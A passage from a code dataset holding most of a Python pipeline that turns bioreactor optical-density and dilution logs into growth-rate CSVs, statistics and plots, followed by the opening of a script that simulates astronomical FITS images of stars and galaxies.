one.'\n\treturn paths, process_log, exp\n\n\ndef functions(args, paths, process_log, exp):\n\t\"\"\"\n\tRuns all functions specified by the command line arguments using the config file variables, while taking not in the log variable.\n\n\t:param args: list of command line arguments\n\t:param paths: list with config file paths\n\t:param process_log: log for keeping track of processes\n\t:param exp: path to experiment\n\t:return: log of all processes that were run\n\t\"\"\"\n\t# make sure at least one data set is specified\n\tif not args.u and not args.od:\n\t\tprint('ERROR: Data set not specified.')\n\tif args.u:\n\t\t# parse function takes log file and exports u csv\n\t\tif args.parse:\n\t\t\twith open(exp + paths['log file'] + '.dat') as f: # open input file\n\t\t\t\tlog = f.read()\n\n\t\t\tprocess_log += '\\nParsing u from log file...'\n\t\t\tudata = parse_u(log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['u'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tufile = open(exp + paths['u'] + '.csv', 'w')\n\t\t\twru = csv.writer(ufile, quoting=csv.QUOTE_ALL)\n\t\t\tfor u in udata:\n\t\t\t\twru.writerow(u)\n\n\t\t\tf.close()\n\t\t\tufile.close()\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# rate function takes u csv and exports u growth rate csv\n\t\tif args.rate:\n\t\t\tprocess_log += '\\nGrowth rates for u calculating...'\n\t\t\tprocess_log = machine_to_human(exp + paths['u'], exp + paths['u machine time'], process_log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['u growth rates'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tu_rate(exp + paths['u'], exp + paths['u growth rates'])\n\t\t\tprocess_log += '\\n\\tGrowth rates calculated and exported.'\n\t\t# stats function takes u csv and exports a csv for each chamber\n\t\tif args.stats:\n\t\t\tprocess_log += '\\nStats for u calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['u statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['u'], exp + paths['u statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['u'], exp + paths['u statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# stats function takes u growth rate csv and exports a csv for each chamber\n\t\tif args.r_stats:\n\t\t\tprocess_log += '\\nStats for u growth rates calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['u growth statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['u growth rates'], exp + paths['u growth statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['u growth rates'], exp + paths['u growth statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# graph functions take specific od csv and exports graphs based on command line arguments\n\t\tif args.graph:\n\t\t\tif '1' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '2' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '3' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u growth rates...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u growth rates graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u growth rates'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '4' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for u growth stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['u growth statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['u growth statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\tif args.od:\n\t\t# parse function takes log file and exports od csv\n\t\tif args.parse:\n\t\t\tprocess_log += '\\nParsing od from log file...'\n\t\t\twith open(exp + paths['log file'] + '.dat') as f: # open input file\n\t\t\t\tlog = f.read()\n\n\t\t\toddata = parse_od(log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\todfile = open(exp + paths['od'] + '.csv', 'w')\n\t\t\twrod = csv.writer(odfile, quoting=csv.QUOTE_ALL)\n\t\t\tfor od in oddata:\n\t\t\t\twrod.writerow(od)\n\n\t\t\tf.close()\n\t\t\todfile.close()\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# parse function takes odlog file and exports od csv\n\t\tif args.odlog:\n\t\t\tprocess_log += '\\nParsing od from odlog file...'\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\t\t\tparse_odlog(exp + paths['odlog'], exp + paths['blank'], exp + paths['od'])\n\t\t\tprocess_log += '\\n\\tParsed csv created and exported.'\n\t\t# rate function takes od csv and exports od growth rate csv\n\t\tif args.rate:\n\t\t\tprocess_log += '\\nGrowth rates for od calculating...'\n\t\t\tprocess_log = machine_to_human(exp + paths['od'], exp + paths['od machine time'], process_log)\n\n\t\t\t# tell user if file exists and will be overwritten or if new file will be made\n\t\t\tif os.path.exists(exp + paths['od growth rates'] + '.csv'):\n\t\t\t\tprocess_log += '\\n\\tOutput file exists, will overwrite.'\n\t\t\telse:\n\t\t\t\tprocess_log += '\\n\\tOutput file not found, will make new file.'\n\n\t\t\tod_rate(exp + paths['od'], exp + paths['od growth rates'])\n\t\t\tprocess_log += '\\n\\tGrowth rates calculated and exported.'\n\t\t# stats function takes od csv and exports a csv for each chamber\n\t\tif args.stats:\n\t\t\tprocess_log += '\\nStats for od calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['od statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['od'], exp + paths['od statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['od'], exp + paths['od statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# stats function takes od growth rate csv and exports a csv for each chamber\n\t\tif args.r_stats:\n\t\t\tprocess_log += '\\nStats for od growth rates calculating...'\n\t\t\tdead, dead, process_log = validate_output_path(args, exp + paths['od growth statistics'], False, process_log)\n\t\t\tif args.block:\n\t\t\t\tstatistics(exp + paths['od growth rates'], exp + paths['od growth statistics'], args.interval, exp + paths['block'])\n\t\t\telse:\n\t\t\t\tstatistics(exp + paths['od growth rates'], exp + paths['od growth statistics'], args.interval, '')\n\t\t\tprocess_log += '\\n\\tStats csv calculated and exported.'\n\t\t# graph functions take specific od csv and exports graphs based on command line arguments\n\t\tif args.graph:\n\t\t\tif '1' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '2' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '3' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od growth rates...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od growth rates graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od growth rates'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\t\t\tif '4' in args.graph:\n\t\t\t\tprocess_log += '\\nGraphing for od growth stats...'\n\t\t\t\toutput, limits, process_log = validate_output_path(args, exp + paths['od growth statistics graphs'], True, process_log)\n\t\t\t\tgraphs(args, exp + paths['od growth statistics'], output, limits)\n\t\t\t\tprocess_log += '\\n\\tGraphs exported.'\n\treturn process_log\n\n\ndef machine_to_human(intake, output, process_log):\n\t\"\"\"\n\tConverts machine time (seconds with starting time long ago) to hours from experiment start.\n\tGenerates new csv and renames the old csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t:param process_log: log for keeping track of processes\n\t:return: returns updated log of program processes\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None,\n\t\t\t\t\t\t\tnames=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\ttime_start = df.iloc[0, 0]\n\t# Checks if the first time point is in machine time\n\tif time_start > 1:\n\t\tprocess_log += '\\n\\tData set is using machine time. Converting to human time...'\n\t\t# Renames the csv using machine time\n\t\tcommand = \"mv '{}.csv' '{}.csv'\".format(intake, output)\n\t\tos.system(command)\n\t\tnew_data = []\n\t\t# Iterates through rows of csv and changes time point to hours in new row array\n\t\t# Joins each array into new data array and saves to a new csv\n\t\tfor row in df.itertuples():\n\t\t\tnew_row = []\n\t\t\trow_id = True\n\t\t\tfor element in row:\n\t\t\t\tif row_id:\n\t\t\t\t\trow_id = False\n\t\t\t\telif len(new_row) == 0:\n\t\t\t\t\tnew_row.append((element - time_start) / 3600)\n\t\t\t\telse:\n\t\t\t\t\tnew_row.append(element)\n\t\t\tnew_data.append(new_row)\n\t\tnumpy.savetxt('{}.csv'.format(intake), new_data, delimiter=\",\")\n\t\tprocess_log += '\\n\\tData set is using machine time. Data set with human time created.'\n\telse:\n\t\tprocess_log += '\\n\\tData set is using human time.'\n\t\n\treturn process_log\n\n\ndef validate_output_path(args, output, function, process_log):\n\t\"\"\"\n\tCreates the output folder if there is none.\n\tParses limits for graphs based on command line parameters.\n\n\t:param args: command line argument array for limit parsing\n\t:param output: path for export\n\t:param function: specify true if function is graphs for limit parsing\n\t:param process_log: log for keeping track of processes\n\t:return: new output based on limits, limits for graphs, and updated log for program processes\n\t\"\"\"\n\tlim_str = ''\n\tlimits = [0.0, 0.0, 0.0, 0.0]\n\t# graphs will have x and y limits parsed and used for the output directory\n\tif function:\n\t\tif args.xlim:\n\t\t\ttemp = args.xlim\n\t\t\tlimits[0] = float(temp.split(\"-\")[0])\n\t\t\tlimits[1] = float(temp.split(\"-\")[1])\n\t\t\tlim_str = lim_str + ' x' + args.xlim\n\t\tif args.ylim:\n\t\t\ttemp = args.ylim\n\t\t\tlimits[2] = float(temp.split(\"-\")[0])\n\t\t\tlimits[3] = float(temp.split(\"-\")[1])\n\t\t\tlim_str = lim_str + ' y' + args.ylim\n\t\tif args.sd:\n\t\t\tlim_str = lim_str + ' sd'\n\t\telif args.se:\n\t\t\tlim_str = lim_str + ' se'\n\n\t# create an output directory if none exists\n\tif not os.path.exists('{}{}'.format(output, lim_str)):\n\t\tos.system(\"mkdir '{}{}'\".format(output, lim_str))\n\t\tprocess_log += '\\n\\tOutput folder not found, made new folder.'\n\telse:\n\t\tprocess_log += '\\n\\tOutput folder found, will overwrite previous files.'\n\toutput = '{}{}'.format(output, lim_str)\n\n\treturn output, limits, process_log\n\n\ndef parse_u(rdata):\n\t\"\"\"\n\tParses dilution values from the log file.\n\n\t:param rdata: string of log file contents\n\t:return: array of all dilution values\n\t\"\"\"\n\tlines = rdata.split('\\n') # Parse input file into list of lines\n\tdata = []\n\tfor line in lines[:-1]:\n\t\td1 = line.split(\":\")\n\t\td2 = [int(d1[1][:-7])]\n\t\tus = d1[3][2:-6].split(\",\")\n\t\tfor u in us:\n\t\t\td2.append(float(u))\n\t\tdata.append(tuple(d2))\n\n\treturn data\n\n\ndef parse_od(rdata):\n\t\"\"\"\n\tParses optical density values from the log file.\n\n\t:param rdata: string of log file contents\n\t:return: array of all optical density values\n\t\"\"\"\n\tlines = rdata.split('\\n') # Parse input file into list of lines\n\tdata = []\n\tfor line in lines[:-1]:\n\t\td1 = line.split(\":\")\n\t\td2 = [int(d1[1][:-7])]\n\t\tods = d1[2][2:-6].split(\",\")\n\t\tfor od in ods:\n\t\t\td2.append(float(od))\n\t\tdata.append(tuple(d2))\n\n\treturn data\n\n\ndef parse_odlog(odlog, blank, output):\n\t\"\"\"\n\tParses optical density values from the odlog file.\n\n\t:param odlog: path to od data\n\t:param blank: path to blank od data\n\t:param output: path for export\n\t\"\"\"\n\tblank_file = open(blank + '.dat', 'r')\n\tblank_content = blank_file.read()\n\tblank_file.close()\n\tblank_data = list(map(int, blank_content.split()))\n\tbtx = blank_data[0::2]\n\tbrx = blank_data[1::2]\n\n\todlog_file = open(odlog + '.dat', 'r')\n\todlog_content = odlog_file.readlines()\n\todlog_file.close()\n\tod_list = []\n\tfor line in odlog_content:\n\t\tline = list(map(int, line.split()))\n\t\ttemp_ods = [int(line[0])]\n\t\ttx = line[1::2]\n\t\trx = line[2::2]\n\t\tfor num in range(8):\n\t\t\tif tx[num] == 0 or rx[num] == 0 or brx[num] == 0 or btx[num] == 0:\n\t\t\t\ttemp_ods.append(0)\n\t\t\t\tcontinue\n\t\t\tblank_od = float(brx[num]) / float(btx[num])\n\t\t\tod_measure = float(rx[num]) / float(tx[num])\n\t\t\ttemp_ods.append(log10(blank_od/od_measure))\n\t\tod_list.append(temp_ods)\n\todfile = open(output + '.csv', 'w')\n\twrod = csv.writer(odfile, quoting=csv.QUOTE_ALL)\n\twrod.writerows(od_list)\n\todfile.close()\n\n\ndef u_rate(intake, output):\n\t\"\"\"\n\tCalculates growth rate data based on dilutions (u) and saves to csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\tnew_data_r = []\n\ttime_start = df.iloc[0, 0]\n\tprevious_time = df.iloc[0, 0]\n\ttime_difference = 0\n\tfor row in df.itertuples():\n\t\tnew_row = []\n\t\trow_id = True\n\t\t# Iterates through each row and row element in data frame\n\t\t# adds calculated growth rates to new row array, which is added to new data array\n\t\tfor element in row:\n\t\t\t# Disregard first element (row number added by pandas when data frame is made)\n\t\t\tif row_id:\n\t\t\t\trow_id = False\n\t\t\t\tcontinue\n\t\t\t# Second element is the time point and time difference is calculated (should always be 60 sec)\n\t\t\telif len(new_row) == 0:\n\t\t\t\tnew_row.append(element - time_start)\n\t\t\t\ttime_difference = element - previous_time\n\t\t\t\tprevious_time = element\n\t\t\t# If first row of data frame (determined by time point) or zero value, it is arbitrarily set to zero\n\t\t\telif element == 0 or new_row[0] == 0:\n\t\t\t\tnew_row.append(float(0))\n\t\t\t# Rest of elements will be values that do not cause errors when calculating growth rate\n\t\t\telse:\n\t\t\t\tnew_row.append(round((numpy.log(1 + (element / 15000)) / time_difference), 6)) # pylint: disable=E1101\n\t\tnew_data_r.append(new_row)\n\n\tnumpy.savetxt('{}.csv'.format(output), new_data_r, delimiter=\",\")\n\n\ndef od_rate(experiment, output):\n\t\"\"\"\n\tCalculates growth rate data based on optical density (od) and saves to csv.\n\n\t:param intake: path to data\n\t:param output: path for export\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(experiment), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\tnew_data_r = []\n\ttime_start = df.iloc[0, 0]\n\tprevious_time = df.iloc[0, 0]\n\ttime_difference = 0\n\tprevious_od = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]\n\tfor row in df.itertuples():\n\t\tnew_row = []\n\t\trow_id = True\n\t\tch_count = 0\n\t\t# Iterates through each row and row element in data frame\n\t\t# adds calculated growth rates to new row array, which is added to new data array\n\t\tfor element in row:\n\t\t\t# Disregard first element (row number added by pandas when data frame is made)\n\t\t\tif row_id:\n\t\t\t\trow_id = False\n\t\t\t\tcontinue\n\t\t\t# Second element is the time point and time difference is calculated (should always be 60 sec)\n\t\t\telif len(new_row) == 0:\n\t\t\t\tnew_row.append(element - time_start)\n\t\t\t\ttime_difference = element - previous_time\n\t\t\t\tprevious_time = element\n\t\t\t\tcontinue\n\t\t\t# If first row of data frame (determined by time point) it is arbitrarily set to zero\n\t\t\telif new_row[0] == 0:\n\t\t\t\tnew_row.append(float(0))\n\t\t\t# Negative OD's are ignored with growth rate being a blank space\n\t\t\telif element < 0 or previous_od[ch_count] < 0:\n\t\t\t\tnew_row.append(None)\n\t\t\t\tprevious_od[ch_count] = element\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tnew_row.append(round((numpy.log(element / previous_od[ch_count]) / time_difference), 6)) # pylint: disable=E1101\n\t\t\t\t# If the growth rate calculation fails (it will for values <= 0) then append a blank space\n\t\t\t\texcept (Warning, Exception) as err:\n\t\t\t\t\t# For showing the warning or exception, uncomment the below line\n\t\t\t\t\t# print('{}'.format(err))\n\t\t\t\t\tnew_row.append(None)\n\t\t\t\t# Each element is saved for comparison with the next element of that chamber\n\t\t\t\tprevious_od[ch_count] = element\n\t\t\tch_count += 1\n\t\tnew_data_r.append(new_row)\n\n\tdf = pandas.DataFrame(new_data_r)\n\tdf.to_csv(path_or_buf='{}.csv'.format(output), index=False)\n\n\ndef statistics(intake, output, interval, block):\n\t\"\"\"\n\tAnalyzes growth rate csv for general statistics (averages, standard deviation, and standard error).\n\n\t:param intake: path to data\n\t:param output: path for export\n\t:param interval: modify default hour time interval by multiplication\n\t:param block: path to blocklog file\n\t\"\"\"\n\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\n\t# if blocklog file is specified, then separate stats into blocks\n\tif len(block) > 0:\n\t\t# for each chamber, will iterate through dataframe and iterate through blocklog data as each block time is reached\n\t\tblocklog_file = open(block, 'r')\n\t\tblocklog = csv.reader(blocklog_file)\n\t\tblocklog_file.close()\n\t\tfor chamber in range(2, 10):\n\t\t\t# for first blocklog row, define setpoint, next setpoint, start of block, end of block, block, and blocklog row \n\t\t\tsetpoint = float(blocklog[0][2].split(',')[chamber-2])\n\t\t\tnext_setpoint = float(blocklog[1][2].split(',')[chamber-2])\n\t\t\trow_start = 0\n\t\t\trow_end = float(blocklog[0][4])\n\t\t\tblock = 1\n\t\t\tblock_row = 1\n\t\t\tstart_time = 0\n\t\t\tend_time = 0\n\t\t\tnew_block_r = []\n\t\t\tblock_r = [['Block', 'Mean', 'SD', 'SE', 'Block Start', 'Block End', 'Start Time', 'End Time', 'n']]\n\t\t\tfor row in df.itertuples():\n\t\t\t\t# if element is a number (not a NaN) then add to block\n\t\t\t\tif not math.isnan(row[chamber]):\n\t\t\t\t\tnew_block_r.append(row[chamber])\n\t\t\t\t\tend_time = row[1]\n\t\t\t\t# if the end of the block has been reached, save stats on that block\n\t\t\t\tif row[1] >= row_end and len(new_block_r) >= 1:\n\t\t\t\t\tnum = len(new_block_r)\n\t\t\t\t\tmean = numpy.mean(new_block_r)\n\t\t\t\t\tsd = numpy.std(new_block_r)\n\t\t\t\t\tsem = sd / numpy.sqrt(num)\n\t\t\t\t\t# compare current and next setpoint, if greater then it is a block period, if less then it is a dilution period (marked as 0)\n\t\t\t\t\tif sum(setpoint) > sum(next_setpoint):\n\t\t\t\t\t\tblock_r.append([block, mean, sd, sem, row_start, row_end, start_time, end_time, num])\n\t\t\t\t\t\tblock += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tblock_r.append([0, mean, sd, sem, row_start, row_end, start_time, end_time, num])\n\t\t\t\t\t# iterate to next blocklog row, start of block, end of block, setpoint, and next setpoint\n\t\t\t\t\tblock_row += 1\n\t\t\t\t\trow_start = row_end\n\t\t\t\t\tsetpoint = next_setpoint\n\t\t\t\t\ttry:\n\t\t\t\t\t\trow_end = float(blocklog[block_row][4])\n\t\t\t\t\t\tnext_setpoint = float(blocklog[block_row][2].split(',')[chamber-2])\n\t\t\t\t\texcept:\n\t\t\t\t\t\trow_end = numpy.mean(df.tail(2)['Time'])\n\t\t\t\t\t\tnext_setpoint = float(blocklog[block_row-2][2].split(',')[chamber-2])\n\t\t\t\t\tnew_block_r = []\n\t\t\t\t\tstart_time = row[1]\n\t\t\tstats = pandas.DataFrame(block_r)\n\t\t\tstats.to_csv(path_or_buf='{}/ch{}.csv'.format(output, chamber-1), index=False, header=False)\n\t# otherwise separate stats by hour\n\telse:\n\t\t# for each chamber, iterate through dataframe to calculate stats\n\t\tfor chamber in range(2, 10):\n\t\t\tstart_time = 0\n\t\t\tend_time = 0\n\t\t\tnew_block_r = []\n\t\t\t# multiple default 1 hour by command line argument\n\t\t\thour = 1 * float(interval)\n\t\t\tblock_r = [['Hour', 'Mean', 'SD', 'SE', 'Start Time', 'End Time', 'n']]\n\t\t\tfor row in df.itertuples():\n\t\t\t\t# if element is a number (not a NaN) then add to block\n\t\t\t\tif not math.isnan(row[chamber]):\n\t\t\t\t\tnew_block_r.append(row[chamber])\n\t\t\t\t\tend_time = row[1]\n\t\t\t\t# if the end of the hour unit has been reached, then save stats on that hour\n\t\t\t\tif row[1] >= hour and len(new_block_r) >= 1:\n\t\t\t\t\tnum = len(new_block_r)\n\t\t\t\t\tmean = numpy.mean(new_block_r)\n\t\t\t\t\tsd = numpy.std(new_block_r)\n\t\t\t\t\tsem = sd / numpy.sqrt(num)\n\t\t\t\t\tblock_r.append([hour, mean, sd, sem, start_time, end_time, num])\n\t\t\t\t\t# multiple default 1 hour by command line argument\n\t\t\t\t\thour += 1 * float(interval)\n\t\t\t\t\tnew_block_r = []\n\t\t\t\t\tstart_time = row[1]\n\t\t\tstats = pandas.DataFrame(block_r)\n\t\tstats.to_csv(path_or_buf='{}/ch{}.csv'.format(output, chamber-1), index=False, header=False)\n\n\ndef graphs(args, intake, output, limits):\n\t\"\"\"\n\tCreates a scatter plot for each chamber based on defined x and y limits and a data set csv.\n\n\t:param args: command line argument array for error bar and data set parsing\n\t:param intake: path to data\n\t:param output: path for export\n\t:param limits: x and y limits to use for graphs\n\t\"\"\"\n\tif '2' in args.graph or '4' in args.graph:\n\t\tfor chamber in range(1, 9):\n\t\t\tdf = pandas.read_csv('{}/ch{}.csv'.format(intake, chamber), header=1, names=['Hour', 'Mean', 'SD', 'SE', 'Start Time', 'End Time', 'n'])\n\t\t\tif args.sd:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean', yerr='SD')\n\t\t\telif args.se:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean', yerr='SE')\n\t\t\telse:\n\t\t\t\tdf.plot.scatter(x='Hour', y='Mean')\n\t\t\t# If x or y limits are not zero, then resize graph to the inputted limits\n\t\t\tif limits[0] != limits[1]:\n\t\t\t\tplt.xlim(limits[0], limits[1])\n\t\t\tif limits[2] != limits[3]:\n\t\t\t\tplt.ylim(limits[2], limits[3])\n\t\t\tplt.savefig('{}/ch{}.png'.format(output, chamber))\n\t\t\tplt.close()\n\telse:\n\t\tdf = pandas.read_csv('{}.csv'.format(intake), header=None, names=['Time', '1', '2', '3', '4', '5', '6', '7', '8'])\n\t\tfor chamber in range(1, 9):\n\t\t\tdf.plot.scatter(x='Time', y='{}'.format(chamber))\n\t\t\t# If x or y limits are not zero, then resize graph to the inputted limits\n\t\t\tif limits[0] != limits[1]:\n\t\t\t\tplt.xlim(limits[0], limits[1])\n\t\t\tif limits[2] != limits[3]:\n\t\t\t\tplt.ylim(limits[2], limits[3])\n\t\t\tplt.savefig('{}/ch{}.png'.format(output, chamber))\n\t\t\tplt.close()\n\t\t\t\n\ndef log_functions(args, process_log, exp):\n\t\"\"\"\n\tPrints and/or updates the log of processes from this growth rate program based on command line arguments.\n\n\t:param args: command line argument array for deciding print and/or file write-out\n\t:param process_log: log for keeping track of processes\n\t:param exp: path to experiment\n\t\"\"\"\n\tif args.print:\n\t\tprint(process_log)\n\tif args.log:\n\t\t# if previous process log file found, save contents before overwriting\n\t\tif os.path.exists(exp + paths['log processes'] + '.log'):\n\t\t\tprocess_log += '\\nPrevious process log found, will add to content.'\n\t\t\twith open(exp + paths['log processes'] + '.log', 'r') as log_file:\n\t\t\t\told_log = log_file.read()\n\t\t\t\tprocess_log = process_log + '\\n\\n' + old_log\n\t\t\tlog_file.close()\n\t\telse:\n\t\t\tprocess_log += '\\nNo process log found, will create new.'\n\t\twith open(exp + paths['log processes'] + '.log', 'w') as log_file:\n\t\t\tlog_file.write(process_log)\n\t\tlog_file.close()\n\n\nmain()\n","sub_path":"Growth-Pipe.py","file_name":"Growth-Pipe.py","file_ext":"py","file_size_in_byte":29501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"215422937","text":"#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\nimport pyfits as pf\nimport pylab as pl\nimport scipy.signal as sig\nimport numpy as np\nimport numpy.fft as fft\nfrom math import *\nfrom scipy import random\nfrom fits_lib import *\n\nmaxROW = 4096\nmaxCOL = 4096\nhdulist = pf.open('blank.fits')\nhdulist.close()\nflux20=hdulist[0].header['FLUX20']\nexptime=hdulist[0].header['EXPTIME']\ncrpix1=hdulist[0].header['CRPIX1']\ncrpix2=hdulist[0].header['CRPIX2']\ncrval1=hdulist[0].header['CRVAL1']\ncrval2=hdulist[0].header['CRVAL2']\ncd1_1=hdulist[0].header['CD1_1']\ncd1_2=hdulist[0].header['CD1_2']\ncd2_1=hdulist[0].header['CD2_1']\ncd2_2=hdulist[0].header['CD2_2']\n\ndef RADECtoRowCol(RA,DEC):\n\trow = 1/(cd1_2*cd2_1-cd1_1*cd2_2)*(cd2_1*(RA-crval1)-cd1_1*(DEC-crval2))+crpix2\n\tcol = 1/(cd1_2*cd2_1-cd1_1*cd2_2)*(-cd2_2*(RA-crval1)+cd1_2*(DEC-crval2))+crpix1\n\treturn (int(row),int(col))#revisar bien esto despues\n\ndef psersic(Re,n,m,xc,yc,x,y,el,theta):\n\tbn = 2*n-0.324\n\tln = mToCounts(m,20,flux20)\n\tI0 = ln*bn**2/((Re**2)*2*pi*n*gamma(2*n))\n\tE = sqrt(((x-xc)*cos(theta)+(y-yc)*sin(theta))**2+((x-xc)*sin(theta)-(y-yc)*cos(theta))**2/(1-el)**2)\n\tI = I0*exp(-bn*(E/Re)**(1/n))\n\treturn I\n\ndef mToCounts(m, m0, F0):\n\treturn exptime*F0*10**(-2/5*(m-m0))\n\ndef addStar(hdu, m, RA, DEC):\n\t(ROW,COL) = RADECtoRowCol(RA,DEC)\n\tif 0 <= ROW < maxROW and 0 <= COL < maxCOL:\t\n\t\thdu[ROW,COL] += mToCounts(m,20,flux20)\n\t\t#print ROW,COL,mToCounts(m,20,flux20)\n\treturn\n\ndef addStellarCatalog(hdu, catalog):\n\tfor linea in open(catalog):\n\t\tlinea = linea.strip()\n\t\tobj, ra, dec,mag,sed,index,tipo = linea.split()\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tmag = float(mag)\n\t\t#print ra,dec,RADECtoRowCol(ra,dec)\n\t\taddStar(hdu,mag,ra,dec)\n\treturn\n\ndef addGalaxy(hdu, m, RA, DEC, n, Re, el, theta):\n\t(ROW,COL)=RADECtoRowCol(RA,DEC)\n\tif 0 <= ROW < maxROW and 0 <= COL < maxCOL:\t\n\t\ta1=int(ROW-5*Re)\n\t\tb1=int(ROW+5*Re)\n\t\ta2=int(COL-5*Re)\n\t\tb2=int(COL+5*Re)\n\t\tfor y in range(a1,b1):\n\t\t\tfor x in range(a2,b2):\n\t\t\t\tif 0 <= y < maxROW and 0 <= x < maxCOL:\n\t\t\t\t\thdu[y,x] += psersic(Re,n,m,COL,ROW,x,y,el,theta)\n\t\t#hdu[ROW,COL]+=mToCounts(m,20,flux20)*(2*n-0.324)**2/((Re**2)*2*pi*n*gamma(2*n))\n\t\t#print ROW,COL, mToCounts(m,20,flux20)*(2*n-0.324)**2/((Re**2)*2*pi*n*gamma(2*n))\n\treturn\n\ndef addGalaxyCatalog(hdu, catalog):\n\ti=0\n\tfor linea in open(catalog):\n\t\tlinea = linea.strip()\n\t\tobj, ra, dec,mag,sed,redshift,tipo,n,re,elip,o = linea.split()\n\t\tra = float(ra)\n\t\tdec = float(dec)\n\t\tmag = float(mag)\n\t\tn = float(n)\n\t\tre = float(re)\n\t\telip = float(elip)\n\t\to = float(o)\n\t\taddGalaxy(hdu,mag,ra,dec,n,re,elip,o)\n\t\ti += 1\n\t\t# if i > 100: break\n\treturn\n\ndef addBackground (hdu, background):\n\thdu += background\n\treturn\n\ndef convolvePSF (hdu, sigma):\n\tN = 10\n\tx = np.zeros((N,N)) + np.arange(N)\n\ty = x.transpose()\n\t\n\tsigma_x = sigma\n\tsigma_y = sigma\n\ts = 0.01/(2*np.pi*sigma_x*sigma_y)\n\tx_zero = N/2\n\ty_zero = N/2\n\tgaussian = 